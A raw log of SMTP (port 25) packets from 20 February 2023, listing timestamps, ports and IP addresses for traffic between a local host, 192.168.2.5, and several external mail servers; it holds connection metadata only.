Feb 20, 2023 09:50:44.103780031 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.125051022 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.125386000 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.130601883 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.130660057 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.130892038 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.131031036 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.152005911 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.152414083 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.153338909 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.154300928 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.157681942 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.157726049 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.158143997 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.158191919 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.179070950 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.179356098 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.184923887 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.185133934 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.185139894 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.185349941 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.206041098 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.206326962 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.212145090 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.212220907 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.212548018 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.212655067 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.232907057 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.233217955 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.239288092 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.239339113 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.239728928 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.239809036 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.241847038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.251492977 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.259829998 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.260351896 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.266475916 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.266608000 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.266777039 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.266992092 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.278386116 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.281905890 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.286859989 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.287187099 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.293461084 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.293704033 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.293726921 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.293926001 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.301831007 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.314049959 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.314270020 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.315834999 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.316834927 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.320467949 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.320637941 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.320673943 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.320777893 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.333937883 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.334187031 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.340827942 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.341176033 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.347450972 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.347579956 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.347731113 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.347915888 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.361001968 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.361336946 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.367758036 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.368060112 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.374502897 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.374744892 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.374833107 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.375039101 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.388134956 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.388436079 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.394722939 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.394977093 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.401613951 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.401843071 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.401864052 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.402015924 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.415246964 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.415412903 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.421678066 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.421873093 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.428653955 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.428761005 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.428864956 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.428953886 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.442174911 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.442420006 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.448468924 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.448776960 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.455559015 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.455674887 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.455791950 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.455837965 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.469134092 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.469357967 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.475343943 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.475613117 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.478424072 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.479383945 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.482419968 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.482491970 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.482640982 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.482738972 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.496156931 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.496453047 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.502163887 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.502300024 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.509390116 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.509459019 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.509618998 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.510729074 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.523173094 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.523374081 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.528776884 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.528964043 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.536334038 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.536524057 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.537491083 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.537656069 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.550143003 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.550297976 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.555493116 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.555747032 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.563199997 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.563371897 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.564384937 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.564522028 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.577095985 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.577287912 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.582333088 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.582515955 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.590063095 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.590291977 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.591249943 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.591451883 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.604062080 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.604296923 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.609046936 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.609296083 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.617055893 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.617326021 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.618187904 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.618402958 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.631037951 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.631189108 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.635837078 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.636076927 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.641004086 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.641741991 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.643908978 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.644088030 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.645091057 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.645236969 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.657805920 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.658009052 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.662623882 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.662811995 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.670679092 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.670906067 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.671891928 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.672069073 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.684686899 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.684859991 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.689382076 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.689541101 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.697566032 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.697730064 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.698812962 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.698998928 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.711513042 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.711689949 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.716001987 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.716228962 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.724353075 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:44.724366903 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.724520922 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.725747108 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.725910902 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.738369942 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.738564014 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.742841005 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.742969036 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.751101971 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.751286030 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.752748013 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.752888918 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.765280962 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.765440941 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.769506931 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.769676924 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.777872086 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.778059959 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.779650927 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.779812098 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.787288904 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:44.787381887 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:44.792038918 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.792190075 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.796097040 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.796303988 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.803240061 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.803864002 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.804609060 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.804799080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.806515932 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.806706905 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.819000006 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.819224119 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.822726965 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.822947979 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.831480980 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.831768036 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.833497047 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.833771944 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.846086979 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.846287012 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.849431038 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.849661112 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.849827051 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:44.858685017 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.858886003 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.860672951 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:44.860727072 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.860888004 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.873213053 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.873367071 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.876224041 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.876457930 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.885684013 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.885879993 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.889306068 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.889523983 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.900216103 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.900500059 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.903043985 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.903304100 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.912519932 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.912796974 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.916313887 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.916587114 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.923763037 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:44.924978971 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:44.927210093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.927464962 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.929765940 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.930001974 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.939670086 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.939958096 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.943440914 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.943728924 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.954221010 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.954709053 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.955039024 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:44.956579924 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.956809998 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.965456009 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:44.966346979 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:44.966787100 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.966984987 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.970510006 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.970711946 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.981400013 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.981538057 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.983257055 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.983409882 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.993434906 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.993592978 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.997394085 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.997555971 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.008105993 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.008285999 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.009802103 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.009954929 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.017745018 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.020095110 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.020313978 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.020688057 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.024260998 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.024451971 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.034987926 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.035204887 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.036403894 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.036593914 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.046916008 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.047149897 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.051199913 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.051414967 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.061777115 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.061939955 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.062994003 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.063170910 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.073728085 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.073900938 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.078166962 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.078355074 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.083722115 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.086901903 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.088521004 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.088840008 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.089482069 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.089793921 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.100747108 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.101043940 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.105058908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.105298042 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.115365028 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.115547895 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.116123915 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.116301060 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.127584934 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.127798080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.127806902 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.128575087 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.132019997 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.132208109 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.142203093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.142419100 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.142627954 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.142832041 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.148924112 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.154279947 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.154459000 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.158874989 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.159091949 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.161360979 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.168977976 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.169158936 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.169265985 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.169400930 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.181154013 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.181305885 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.185821056 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.185982943 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.195648909 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.195715904 CET	25	49709	142.250.102.26	192.168.2.5
